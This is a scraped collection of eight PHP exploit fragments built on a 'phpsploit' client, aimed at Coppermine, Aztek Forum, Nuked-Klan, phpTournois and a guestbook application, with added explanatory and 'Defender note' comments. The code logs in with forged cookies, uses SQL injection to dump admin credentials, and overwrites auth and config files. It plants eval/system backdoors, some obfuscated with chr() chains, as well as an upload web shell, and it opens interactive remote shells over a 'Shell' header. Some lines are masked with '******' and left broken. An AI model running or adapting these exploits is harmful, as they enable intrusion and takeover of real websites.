Exemplo n.º 1
    } else {
        return;
    }
}
// Command-line parameters; getparam() and the phpsploit class are defined
// outside this fragment (the second argument presumably marks the parameter
// as required — TODO confirm against getparam()).
$url = getparam("url", 1);
$login = getparam("login", 1);
$pass = getparam("pass", 1);
$email = getparam("email", 1);
$file = getparam("file", 1);
$id = getparam("id");
// Local file read with error suppression: a missing or near-empty file is
// fatal below, but any other failure reason is lost. Neither $source nor
// $email is used anywhere within this fragment.
$source = @file_get_contents($file);
if (strlen($source) < 2) {
    exit("{$file} don't exist.\n");
}
// Scripted login against the target; the credentials travel in the POST body.
$xpl = new phpsploit();
$s = $xpl->post($url . "/index.php?", "sql_pseudo={$login}&sql_pass={$pass}");
//Cookies
// Success is inferred from a Set-Cookie: PHPSESSID header plus the absence of
// the login form's sql_pseudo field in the response body.
// Defender note: the client rebuilds the target's auth cookies by hand, with
// sql_pass set to an unsalted md5() of the password. That suggests the target
// accepts a bare password hash in a cookie as a credential (TODO confirm
// against its session handling); a server-side session that carries nothing
// derivable from the password would not be reproducible this way. On the
// wire, a login POST followed by requests with a handcrafted sql_pass cookie
// is the observable pattern.
if (preg_match("#Set-Cookie: PHPSESSID=([a-z0-9]+)#i", $s, $phpsessid) && !preg_match("#name=\"sql_pseudo\"#i", $s)) {
    $xpl->addcookie("PHPSESSID", $phpsessid[1]);
    $xpl->addcookie("sql_pseudo", $login);
    $xpl->addcookie("sql_pass", md5($pass));
    $xpl->addcookie("auto", "off");
    print "[*] PHPSESSID : {$phpsessid['1']}\n";
} else {
    exit("[*] Can't log in\n");
}
//Id
// If no id was given, scrape the member id from the post-login page by
// matching the profile link whose text is the login name. If the pattern does
// not match, $id_member[1] is undefined and $id ends up null (PHP notice only).
// $login is interpolated into the pattern unescaped, so regex metacharacters
// in a login name would alter the match.
if (!isset($id)) {
    preg_match("#id=([0-9]+)\" title=\"Voir son profil\">" . $login . "<\\/a>#i", $s, $id_member);
    $id = $id_member[1];
}
Exemplo n.º 2
 Table prefix.
/*/
// $url, $adu and $adp (admin username/password) are defined outside this
// fragment, as is the $xpl phpsploit client.
print "\nstatus> Searching the version";
// Version fingerprint: the bundled include/index.html is fetched and a
// "Coppermine version: x.y.z" string is extracted from it.
// Defender note: a static file that advertises the exact version is a cheap
// fingerprinting aid; removing or neutralising such files denies it.
$xpl->get($url . 'include/index.html');
if (preg_match("#Coppermine version: ([0-9]*\\.[0-9]*\\.[0-9]*)#", $xpl->getcontent(), $matches)) {
    print "\nsploit> Coppermine version " . $matches[1];
} else {
    print "\nsploit> Not found";
}
// The users table name is derived from the version string with the dots
// removed (e.g. 1.4.10 -> cpg1410_users) and falls back to cpg1410_users when
// no version was found. $table is not used within this fragment.
$table = !empty($matches[1]) ? 'cpg' . str_replace('.', '', $matches[1]) . '_users' : 'cpg1410_users';
/*/
 If you have the admin cookie (but not the password),
 replace lines 73=>76 by $xpl->addcookie('yourcookie');
/*/
// Note: the line numbers in the comment above refer to the original file,
// not to this listing.
print "\nstatus> Trying to get logged in";
// Login POST; failure is inferred from a "color:red" error style in the
// response body rather than from a status code or redirect.
$xpl->post($url . "login.php?referer=index.php", "username={$adu}&password={$adp}&remember_me=1&submitted=Se+Connecter");
if (!preg_match("#color:red#", $xpl->getcontent())) {
    print "\nsploit> Done";
} else {
    die("\nstatus> Exploit failed\n");
}
/*/
 (usermgr.php)
 =============
 case 'group_alb_access' :
 if (isset($_GET['gid']))  $group_id = $_GET['gid'];
 $sql = "SELECT group_name  FROM [...] WHERE group_id = $group_id [...]";
 $result = cpg_db_query($sql);

 (db_ecard.php)
 ==============
Exemplo n.º 3
// $pra (proxy credentials), $url and the $xpl client come from outside this
// fragment.
if (!empty($pra)) {
    $xpl->proxyauth($pra);
}
print "\nheader>  Aztek Forum 4.1 Multiple Vulnerabilities Exploit";
print "\nheader> ==================================================";
// Step 1: the forum owner name is read from a page fetched with a tautology in
// the fid parameter ("-1 or 1=1"), i.e. the page is expected to render for an
// unfiltered id. Defender note: "fid=-1%20or%201=1" in a query string is a
// plain SQL-injection probe and a straightforward log/WAF signature; the fix
// is a parameterised query (or an integer cast) on fid.
if (preg_match("#href='\\./index\\.php\\?owner=(\\S*)'#i", $xpl->getcontent($xpl->get($url . 'forum.php?fid=-1%20or%201=1')), $matches)) {
    print "\nsploit> Owner -> " . $matches[1];
} else {
    die("\nsploit> Exploit failed");
}
$owner = $matches[1];
// Step 2: self-registration of a throwaway account; login, password and the
// e-mail local part are all the same "phpsploit<rand>" string.
// Defender note: rand() only avoids name collisions here; the fixed
// "phpsploit" prefix and the bogus "hotmail.coum" domain make such accounts
// easy to find in the user table.
print "\nstatus> Trying to register a new user";
$xpl->cookiejar(1);
$xpl->allowredirection(1);
$name = "phpsploit" . rand();
$xpl->post($url . "index.php?owner={$owner}&action=subscribe", "login={$name}&passwd={$name}&passwd2={$name}&email={$name}%40hotmail.coum&show_email=on&cookie=on");
print "\nsploit> Login/Password -> {$name}";
// Step 3: a non-numeric fid provokes an error message containing the absolute
// path of a script ("file ... in function"). Defender note: this is a
// full-path disclosure; display_errors should be off in production so such
// messages reach the log only.
print "\nstatus> Trying to get database informations";
$xpl->get($url . "forum.php?fid=XD");
if (preg_match("#file (.*) in function#i", $xpl->getcontent(), $matches)) {
    print "\nsploit> Full Path Disclosure -> " . $matches[1];
} else {
    print "\nsploit> Failed";
}
// The disclosed path is rewritten to point at the database configuration
// file. If step 3's pattern did not match, $matches is empty, $matches[1]
// raises a notice and $wanted becomes an empty string, which the !empty()
// check that follows guards against.
$wanted = str_replace("forum/load.php", "common/bddconf.php", $matches[1]);
if (!empty($wanted)) {
    $xpl->get($url . "index.php?owner={$owner}&action=profile&_SERVER[email]={$name}%40hotmail.coum&_FILES[upload][tmp_name]={$wanted}&_FILES[upload][name]=0123456789&_FILES[upload][type]=jpg");
    $xpl->get($url . "index.php?owner={$owner}&choix=3");
    if (preg_match("#<IMG src='(.*)' width='([0-9]*)' height='([0-9]*)'>#i", $xpl->getcontent(), $matches)) {
        print "\nsploit> Done (" . $matches[1] . ")";
    } else {
Exemplo n.º 4
// Command-line parameters; getparam() and the phpsploit class are defined
// outside this fragment.
$url = getparam('url', true);
$prx = getparam('proxy', false);
$pra = getparam('proxyauth', false);
// PHP snippet to be planted in the target's config file: it evaluates the
// value of an arbitrary "Shell" request header (HTTP_SHELL) as PHP code.
$cod = 'eval($_SERVER[HTTP_SHELL]);';
$xpl = new phpsploit();
$xpl->agent('Mozilla Firefox');
$xpl->allowredirection(1);
$xpl->cookiejar(1);
if ($prx) {
    $xpl->proxy($prx);
}
if ($pra) {
    $xpl->proxyauth($pra);
}
// Steps 1-3: the auth module is asked to delete its credential file
// (suppr=1), then to recreate it with attacker-chosen credentials, then to
// accept a login with those same credentials — all of them plain POSTs with
// no prior authentication visible here.
// Defender note: deleting or creating auth.inc.php must itself require an
// authenticated administrator; on the wire, "suppr=1" followed by a
// login/password POST to the same module is the signature of this chain.
print "0x01>Deleting the file auth.inc.php";
$xpl->post($url . 'dirsys/modules/auth.php', 'suppr=1');
print "\n0x02>Creating the file auth.inc.php";
$xpl->post($url . 'dirsys/modules/auth.php', 'login=root&password=toor');
print "\n0x03>Trying to log in as Administrator";
$xpl->post($url . 'dirsys/modules/auth.php', 'login=root&password=toor');
// Minimum data necessary (fwrite without quote)
// Step 4: the settings form appears to be written verbatim into
// config.inc.php as PHP source; the DEBUG value "0;<code>//" terminates the
// assignment, appends the eval() snippet and comments out the rest of the
// line. Defender note: writing request values into an executable file
// without quoting/escaping is the root cause — settings belong in a data
// format (or a var_export() of a validated array), and config.inc.php should
// not be directly reachable over HTTP.
$minimdata = 'WIDTH_TREE_FRAME=1&FRAME_BORDER=1&WIDTH_FRAME_BORDER=1&WIDTH_FRAME_SP' . 'ACING=1&SCROLING_TREE_FRAME=1&RESIZE_FRAME=1&WIDTH_TD_SIZE=1&WIDTH_TD' . '_TYPE=1&WIDTH_TD_DATE=1&STYLE=1&TOTALSIZE=1&CHECK_MAJ=1&IMAGE_BROWSER' . '=1&IMAGE_TN=1&GD2=1&IMAGE_JPG=1&IMAGE_GIF=1&IMAGE_BMP=1&IMAGE_TN_SIZE' . '=1&IMAGE_TN_COMPRESSION=1&NB_COLL_TN=1&EXIF_READER=1&SLIDE_SHOW=1&DEB' . 'UG=0;' . urlencode($cod) . '//&SLIDE_SHOW_INT=1&BACK=1&WRITE_TN=1&AUTO_RE' . 'SIZE=1&DETAILS=1&DIRINFO_LIFE=1&activer_Message=1';
print "\n0x04>Creating the file config.inc.php";
$xpl->post($url . 'dirsys/modules/config/post.php', $minimdata);
// Step 5: interactive loop. Each command is sent in a "Shell" request header
// to config.inc.php and the response body is printed. $cmd is unset on the
// first iteration (notice; an empty command goes out), and eregi() no longer
// exists in PHP 7+, so this fragment as written only runs on PHP 5.
// Defender note: a request header named Shell, or any header value containing
// "system(", is anomalous and worth alerting on at the proxy/WAF.
print "\n0x05>Now enter your commands";
do {
    $xpl->addheader('Shell', "@system({$cmd});");
    $xpl->get($url . 'dirsys/config.inc.php');
    print $xpl->getcontent() . "\n0x06>";
} while (!eregi('^quit|exit$', $cmd = trim(fgets(STDIN))));
exit(0);
Exemplo n.º 5
// $url, $c0de (the file content to upload), $mode and the $xpl client are
// defined outside this fragment; the frmdt_* constants are presumably
// phpsploit's multipart form-data keys — TODO confirm against the library.
// Step 1: upload $c0de as a GIF avatar through the profile form.
// Defender note: the check that matters server-side is the *content* of the
// upload (magic bytes / image re-encoding), not the client-declared name
// "1.gif" and type "image/gif", which are attacker-chosen here.
$avatar = array(frmdt_url => $url . '?page=avatars&op=modify', 'avatar' => array(frmdt_filename => '1.gif', frmdt_type => 'image/gif', frmdt_content => $c0de), 'id' => 1, 'mode' => 'J', 'avatarurl' => '', 'avatarremoteurl' => '', 'MAX_FILE_SIZE' => 999999);
// Success is inferred from a location.href snippet in the response.
if (preg_match("#location.href='\\?page=avatars&id=\\d+&mode=J'#i", $xpl->formdata($avatar))) {
    print "done\n";
} else {
    die("error\n");
}
// Step 2: recover the server-side file name of the stored avatar from the
// player page.
if (preg_match('#<span style="float: right;" ><img src="([^"]+)#i', $xpl->get($url . '?page=joueurs&id=1'), $match)) {
    $img = $match[1];
} else {
    die(" * can't find image name\n");
}
/* Change homepage to our avatar, with a null byte, after saving website name. */
// Step 3: the admin configuration form is re-submitted with pagestart set to
// a relative path to the uploaded avatar followed by an encoded NUL ("%00").
// Defender note: this presumably relies on "pagestart" being used in an
// include()-style path that the NUL byte truncates (TODO confirm in the
// target); PHP >= 5.3.4 rejects NUL bytes in filesystem paths, and the
// setting should be restricted to a whitelist of page names in any case.
print " * changing homepage\t";
preg_match('#name=nomsite value="([^ ]+)"#i', $xpl->get($url . '?page=configuration&op=admin'), $all);
// NOTE: the next line is not the original source — the page this listing was
// taken from has masked part of it ("******"), so the POST and the success
// check that originally followed are not recoverable here.
$postdata = "nomsite={$all['1']}&urlsite={$url}&logo=logo.gif&pagestart=../.{$img}%00&inscription_joueur=1&inscription_equipe=1&places=200&emailcontact=&emailinscription=&langue=english&theme=phptournois&gzip=1&poulewin=3&poulenull=2&pouleloose=1&poulefor=0&information=&reglement=&decharge=&shoutbox=1&shoutlimit=20&shoutboxc=255&news=1&ladder=1&messagerie=1&support=0&faq=1&serveur=1&download=1&liens=1&galerie=1&livredor=1&sponsors=0&partenaires=1&forum=1&contact=1&horloge=1&commande=1&avatar=A&avatar_upload=1&avatar_remote=1&avatar_gallerie=0&avatar_filesize_max=100000&avatar_x_max=80&avatar_y_max=80&irc=1&ircserver=euroserv.fr.quakenet.org&ircport=6667&ircpassword=&ircchannels=%23phptournois+%23lan+%23lan.cs+%23lan.q3&mail=N&smtpserver=&smtpuser=&smtppassword="******"done\n";
$success = true;
if ($mode == 0) {
    print " * loading uploader\t";
    $xpl->addheader("upload", "1");
    if (preg_match("#upfiledone#i", $xpl->get($url))) {
        print "done\n";
    } else {
        $success = false;
        print "error\n";
    }
} else {
    print "\n\$shell> ";
    while (!preg_match("#^(quit|exit)\$#", $cmd = trim(fgets(STDIN)))) {
        $xpl->reset('header');
Exemplo n.º 6
// Command-line parameters; getparam() and the phpsploit class come from
// outside this fragment, as does $url (referenced later in this listing).
$adm = getparam("admin");
$acc = getparam("user");
$prx = getparam("proxy");
// Table prefix, defaulting to the stock "nuked_".
$prefix = getparam("prefix") ? getparam("prefix") : "nuked_";
// Payload to be placed on the target: either the contents of a local file
// named by the "file" parameter (read without any error check — a missing
// file yields false, i.e. an empty payload) or, by default, a minimal PHP
// page that accepts arbitrary file uploads into its own directory.
// Defender note: a PHP file that move_uploaded_file()s $_FILES into the web
// root under the client-supplied name is the classic uploader backdoor;
// integrity monitoring of the web root and blocking PHP execution in upload
// directories are the practical controls.
$file_upload_code = getparam("file") ? file_get_contents(getparam("file")) : '<?php if(isset($_POST[\'upload\'])) { if( !move_uploaded_file($_FILES[\'file\'][\'tmp_name\'], "./".$_FILES[\'file\'][\'name\'])) echo("<center>Error ".$_FILES[\'file\'][\'error\']."</center>");else echo "<center>File uploaded</center>"; } ?><form method="post" enctype="multipart/form-data"><center><input type="file" name="file"><input type="submit" name="upload" value="Upload"></center></form>';
// Current date split into year/month/day (not used within this fragment).
$date = array(date('Y'), date('m'), date('d'));
$xpl = new phpsploit();
if ($prx) {
    $xpl->proxy($prx);
}
/* Admin account defined */
if ($adm) {
    print "[*] Using admin account {$adm}\n";
    list($login, $passwd) = explode(":", $adm);
    $xpl->addheader("Referer", $url);
    $c = $xpl->post($url . "index.php?file=User&{$prefix}nude=index&op=login", "pseudo={$login}&pass={$passwd}&remember_me=ok");
    if (preg_match("#{$prefix}sess_id=([a-z0-9]+)#i", $c, $sid) && preg_match("#uid=([a-z0-9]+)#i", $c, $uid)) {
        $admin_sid = $sid[1];
        $admin_uid = $uid[1];
        print "      SID -> {$admin_sid}\n";
        print "      UID -> {$admin_uid}\n";
        finalattack($admin_sid, $admin_uid);
    } else {
        exit("[*] Can't log in\n");
    }
} else {
    /* User account defined */
    if ($acc) {
        print "[*] Using user account {$acc}\n";
        list($login, $passwd) = explode(":", $acc);
        $xpl->addheader("Referer", $url);
Exemplo n.º 7
 |  ... sql_select_query("msg", "alex_livre_txt_lang", "WHERE lang='".$f_language."' and `type`='titre'");
 |  // "SELECT msg FROM `alex_livre_txt_lang` WHERE lang='$f_language' and type=`titre`
 |
/*/
// The $xpl client and $url come from outside this fragment.
// Step 1: SQL injection through the "lang" parameter — a NUL-terminated
// language file name followed by a UNION SELECT whose result is expected to
// land in a <div class="d_title"> element, from which login and password are
// scraped. The comment above quotes the vulnerable query: $f_language is
// interpolated into the WHERE clause unescaped.
// NOTE: this line and the "f_login=..." POST below are not the original
// source — the page this listing was taken from has masked parts of them
// ("******"), which is why the statement is syntactically incomplete here.
// Defender note: the fix is a parameterised query plus a whitelist of
// language names; "union%20select" and "%00" in a lang= parameter are log
// signatures.
$sql = "index.php?lang=english.php%00'%20union%20select%20" . "concat('XPLLogin:'******'XPLPass:'******'#<div class="d_title">XPLLogin:(.*)XPLPass:(.*)</div>#', $xpl->getcontent(), $count)) {
    print "\nsploit> AdminUsername::" . $count[1] . "\nsploit> AdminPassword::" . $count[2];
} else {
    die("\nsploit> Exploit failed");
}
// Step 2: log in to the admin panel with the scraped credentials; the session
// id is taken from a response header (f_sid=<32 hex chars>).
// Defender note: the password is usable as scraped, which implies it is stored
// in plain text or as a directly reusable hash — TODO confirm; either way the
// column should hold a salted password_hash() value.
print "\nstatus> Trying to get logged in";
$xpl->post($url . "admin/index.php", "f_login="******"&f_pass="******"&f_identif=Identification");
if (preg_match("#f_cadres\\.php\\?f_sid=([a-z0-9]{32})#", $xpl->getheader(), $sid)) {
    print "\nsploit> Done";
} else {
    die("\nsploit> Exploit failed");
}
// Step 3: directory traversal in the skin name — per the skins.php comment
// below, the skin directory is created as templates/skins/<aj_skin>/, so
// "../../languages/d4h4x0rskin" lands under languages/ instead.
// Defender note: basename() or a strict [A-Za-z0-9_]+ check on aj_skin
// closes this; "../" in a POST field is a WAF signature.
print "\nstatus> Trying to add a skin";
// skins.php ... @mkdir($chem_absolu."templates/skins/".$_POST['aj_skin']."/", 0755)
$xpl->post($url . "admin/skins.php?f_sid=" . $sid[1], "aj_skin=../../languages/d4h4x0rskin&ajouter=Ajouter");
if (!preg_match('#alert\\("ERREUR\\n#', $xpl->getcontent())) {
    print "\nsploit> Done";
} else {
    die("\nsploit> Exploit failed");
}
// Step 4: the skin editor is used to write PHP into that directory. $scode is
// a chr() chain which, once eval()'d, spells out
// system(stripslashes($_SERVER['HTTP_REFERER'])); — i.e. the planted file
// runs whatever arrives in the Referer request header as a shell command. The
// chr() encoding only hides the keywords from naive string filters.
// Defender note: a template/skin editor must not write outside its own
// directory nor accept "<?php" content; for detection, look for newly created
// .php files under languages/ or templates/skins/ and for eval(chr(
// sequences inside them. $data is built here; the request that sends it is
// outside this fragment.
$scode = "chr(0x73).chr(0x79).chr(0x73).chr(0x74).chr(0x65).chr(0x6d)." . "chr(0x28).chr(0x73).chr(0x74).chr(0x72).chr(0x69).chr(0x70)." . "chr(0x73).chr(0x6c).chr(0x61).chr(0x73).chr(0x68).chr(0x65)." . "chr(0x73).chr(0x28).chr(0x24).chr(0x5f).chr(0x53).chr(0x45)." . "chr(0x52).chr(0x56).chr(0x45).chr(0x52).chr(0x5b).chr(0x27)." . "chr(0x48).chr(0x54).chr(0x54).chr(0x50).chr(0x5f).chr(0x52)." . "chr(0x45).chr(0x46).chr(0x45).chr(0x52).chr(0x45).chr(0x52)." . "chr(0x27).chr(0x5d).chr(0x29).chr(0x29).chr(0x3b)";
$data = "skin_edit=skins.php%3Ff_sid%3D" . $sid[1] . "%26skin_edit" . "%3D../../languages/d4h4x0rskin&alex_livre=<?php\r\n@e" . "val({$scode});exit(0);\r\n?>&add_message=&nb_message_pa" . "ge=&list_pages=&corps_messages=&space=&assembly=&enre" . "gistrer=Enregistrer";
Exemplo n.º 8
// $url, $phpc (multipart form data for the profile photo upload), $config
// (index 0 = table prefix) and the $xpl client are defined outside this
// fragment; char() is defined further down and turns a string into a MySQL
// CHAR(n,n,...) literal.
// Step 1: upload a "photo" through the user preferences form and read back
// the stored file name from the edit_pref page.
$xpl->addheader('Referer', $url);
$xpl->formdata($phpc);
$xpl->get($url . '?file=User&op=edit_pref');
if (!preg_match('#\\<input name=\\"photo\\" value=\\"(\\S+)\\"#', $xpl->getcontent(), $match)) {
    exit("\nNo file found");
} else {
    print "\n\$shell> ";
}
// Step 2: three statements sent one by one through the admin "upgrade_db"
// page, which apparently executes whatever arrives in the "upgrade" field.
// Defender note: a database-upgrade endpoint must run only vetted, bundled
// migration scripts — never a query taken from the request. The VARCHAR(60)
// widening of the type column presumably exists only so that a traversal
// path fits into it.
$sql = array();
$sql[] = "ALTER TABLE {$config['0']}_block CHANGE `type` `type` VARCHAR(60) CHARACTER SET latin1 COLLATE latin1_swedish_ci NOT NULL DEFAULT 0;";
/*
$sql[] = "UPDATE $config[0]_config SET avatar_upload=".char('on')." WHERE name=".char('avatar_upload').";";*/
// The block type is repointed at the uploaded photo via "/../../../<file>",
// presumably so the block loader includes the uploaded file as PHP (TODO
// confirm in the target's block code). Block types should be validated
// against the set of shipped block files rather than used in a path.
$sql[] = "UPDATE {$config['0']}_block SET type=" . char('/../../../' . $match[1] . "") . " WHERE bid=1;";
$sql[] = "DELETE FROM {$config['0']}_nbconnecte;";
for ($i = 0; $i < count($sql); $i++) {
    $xpl->post($url . '?file=Admin&page=mysql&op=upgrade_db', 'upgrade=' . $sql[$i]);
}
// Step 3: interactive loop — each command goes out in a "Shell" request
// header, and the part of the response after the first "123456789" marker is
// printed. Stops on "quit"/"exit". The "#" comment inside the loop holds an
// unrelated injection string and is never executed.
// Defender note: the marker string and the Shell header are both
// request/response signatures for this activity.
while (!preg_match("#^(quit|exit)\$#", $cmd = trim(fgets(STDIN)))) {
    # 0'); include('./conf.inc.php'); print $global['db_pass']; //
    $xpl->reset('header');
    $xpl->addheader('Shell', "system('{$cmd}');");
    $xpl->get($url);
    $data = explode('123456789', $xpl->getcontent());
    print $data[1] . "\n\$shell> ";
}
function char($data)
{
    $char = 'CHAR(';
    for ($i = 0; $i < strlen($data); $i++) {
        $char .= ord($data[$i]);
        if ($i != strlen($data) - 1) {